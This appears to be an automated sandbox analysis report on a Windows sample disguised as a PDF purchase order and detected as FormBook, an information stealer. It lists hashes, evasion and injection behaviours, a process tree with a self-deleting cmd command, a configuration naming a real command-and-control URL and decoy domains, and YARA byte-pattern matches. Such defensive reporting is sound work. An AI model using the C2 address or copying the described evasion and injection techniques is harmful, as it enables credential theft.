Edit tour

Windows Analysis Report
PO-230821_pdf.exe

Overview

General Information

Sample Name:	PO-230821_pdf.exe
Analysis ID:	1295108
MD5:	ac43233dd5fe6d55c112660dc700e564
SHA1:	2f431f411c707593f2f4bd67da5db2e9a9593778
SHA256:	d93182b7b2c8633aa7f379efdc80aa778ecc0b59a01929bb10a02cd8349354d2
Tags:	exeformbook
Infos:

Detection

FormBook, NSISDropper

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

Yara detected NSISDropper

System process connects to network (likely due to code injection or exploit)

Detected unpacking (changes PE section rights)

Antivirus detection for URL or domain

Multi AV Scanner detection for dropped file

Snort IDS alert for network traffic

Sample uses process hollowing technique

Maps a DLL or memory area into another process

Initial sample is a PE file and has a suspicious name

Machine Learning detection for sample

Performs DNS queries to domains with low reputation

Modifies the prolog of user mode functions (user mode inline hooks)

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Queues an APC in another process (thread injection)

Tries to detect virtualization through RDTSC time measurements

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Found decision node followed by non-executed suspicious APIs

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Found evasive API chain (may stop execution after checking a module file name)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

HTTP GET or POST without a user agent

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Sample file is different than original file name gathered from version info

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Checks if the current process is being debugged

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64

PO-230821_pdf.exe (PID: 7080 cmdline: C:\Users\user\Desktop\PO-230821_pdf.exe MD5: AC43233DD5FE6D55C112660DC700E564)

PO-230821_pdf.exe (PID: 7148 cmdline: C:\Users\user\Desktop\PO-230821_pdf.exe MD5: AC43233DD5FE6D55C112660DC700E564)

explorer.exe (PID: 4376 cmdline: C:\Windows\Explorer.EXE MD5: EEC7F02FBAE12687726D441FFADC051D)

autofmt.exe (PID: 6204 cmdline: C:\Windows\SysWOW64\autofmt.exe MD5: A5202257A05BB4D3773A2717317C2D95)

control.exe (PID: 6216 cmdline: C:\Windows\SysWOW64\control.exe MD5: 4DBD69D4C9DA5AAAC731F518EF8EBEA0)

cmd.exe (PID: 6268 cmdline: /c del "C:\Users\user\Desktop\PO-230821_pdf.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: CE1A079265E7A92863BAAD92DE538D72)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://asec.ahnlab.com/en/32149/ https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.zachmahl.com/sn26/"], "decoy": ["resenha10.bet", "gulshan-rajput.com", "xbus.tech", "z813my.cfd", "wlxzjlny.cfd", "auntengotiempo.com", "canada-reservation.com", "thegiftcompany.shop", "esthersilveirapropiedades.com", "1wapws.top", "ymjblnvo.cfd", "termokimik.net", "kushiro-artist-school.com", "bmmboo.com", "caceresconstructionservices.com", "kentuckywalkabout.com", "bringyourcart.com", "miamiwinetour.com", "bobcatsocial.site", "thirdmind.network", "4tbbwa.com", "rhinosecurellc.net", "rdparadise.com", "radpm.xyz", "thewhiteorchidspa.com", "clhynfco.cfd", "ngohcvja.cfd", "woodennickelcandles.com", "gg18rb.cfd", "qcdrxwr.cfd", "974dp.com", "lagardere-vivendi-corp.net", "chestnutmaretraining.com", "seosjekk.online", "ahevrlh.xyz", "uedam.xyz", "natrada.love", "yoywvfw.top", "unifiedtradingjapan.com", "chinakaldi.com", "agenciacolmeiadigital.com", "wdlzzfkc.cfd", "097850.com", "xingcansy.com", "uahrbqtj.cfd", "charliehaywood.com", "witheres.shop", "sqiyvdrx.cfd", "biopfizer.com", "tiktokviewer.com", "prftwgmw.cfd", "sfsdnwpf.cfd", "linkboladewahub.xyz", "orvados.com", "goodshepherdopcesva.com", "christianlovewv.com", "cdicontrols.com", "hawskio26.click", "ownlegalhelp.com", "tiydmdzp.cfd", "ppirr.biz", "stonyatrick.com", "itsamazingbarley.com", "msjbaddf.cfd"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000002.3555201775.0000000000B00000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.3555201775.0000000000B00000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.3555201775.0000000000B00000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000005.00000002.3555201775.0000000000B00000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.3555201775.0000000000B00000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.3579059104.00000000047A0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.3579059104.00000000047A0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.3579059104.00000000047A0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000005.00000002.3579059104.00000000047A0000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.3579059104.00000000047A0000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.1089258487.0000000002470000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.1089258487.0000000002470000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.1089258487.0000000002470000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000000.00000002.1089258487.0000000002470000.00000004.00001000.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.1089258487.0000000002470000.00000004.00001000.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.3619293935.00000000113AE000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_772cc62d	unknown	unknown	0xae2:$a2: pass 0xae8:$a3: email 0xaef:$a4: login 0xaf6:$a5: signin 0xb07:$a6: persistent 0xcda:$r1: C:\Users\user\AppData\Roaming\008N17S7\008log.ini
00000000.00000002.1089171986.0000000002450000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_NSISDropper	Yara detected NSISDropper	Joe Security
00000002.00000002.1177156109.0000000000D40000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1177156109.0000000000D40000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.1177156109.0000000000D40000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000002.00000002.1177156109.0000000000D40000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.1177156109.0000000000D40000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.1174806021.0000000000990000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1174806021.0000000000990000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.1174806021.0000000000990000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000002.00000002.1174806021.0000000000990000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.1174806021.0000000000990000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.3575195181.0000000003030000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.3575195181.0000000003030000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.3575195181.0000000003030000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000005.00000002.3575195181.0000000003030000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.3575195181.0000000003030000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: PO-230821_pdf.exe PID: 7080	Windows_Trojan_Formbook_1112e116	unknown	unknown	0xd6d28:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: PO-230821_pdf.exe PID: 7148	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2b47:$a1: 3C 30 50 4F 53 54 74 09 40 0x164d52:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: control.exe PID: 6216	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x36995:$a1: 3C 30 50 4F 53 54 74 09 40 0xd2351:$a1: 3C 30 50 4F 53 54 74 09 40 0x17ff51:$a1: 3C 30 50 4F 53 54 74 09 40
Click to see the 35 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.PO-230821_pdf.exe.2470000.1.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0.2.PO-230821_pdf.exe.2470000.1.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.PO-230821_pdf.exe.2470000.1.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5451:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bdb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9bbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14aa7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0.2.PO-230821_pdf.exe.2470000.1.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.PO-230821_pdf.exe.2470000.1.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a39:$sqlite3step: 68 34 1C 7B E1 0x17b4c:$sqlite3step: 68 34 1C 7B E1 0x17a68:$sqlite3text: 68 38 2A 90 C5 0x17b8d:$sqlite3text: 68 38 2A 90 C5 0x17a7b:$sqlite3blob: 68 53 D8 7F 8C 0x17ba3:$sqlite3blob: 68 53 D8 7F 8C
2.2.PO-230821_pdf.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.PO-230821_pdf.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.2.PO-230821_pdf.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
2.2.PO-230821_pdf.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.PO-230821_pdf.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
2.2.PO-230821_pdf.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.PO-230821_pdf.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.2.PO-230821_pdf.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5451:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bdb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9bbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14aa7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
2.2.PO-230821_pdf.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
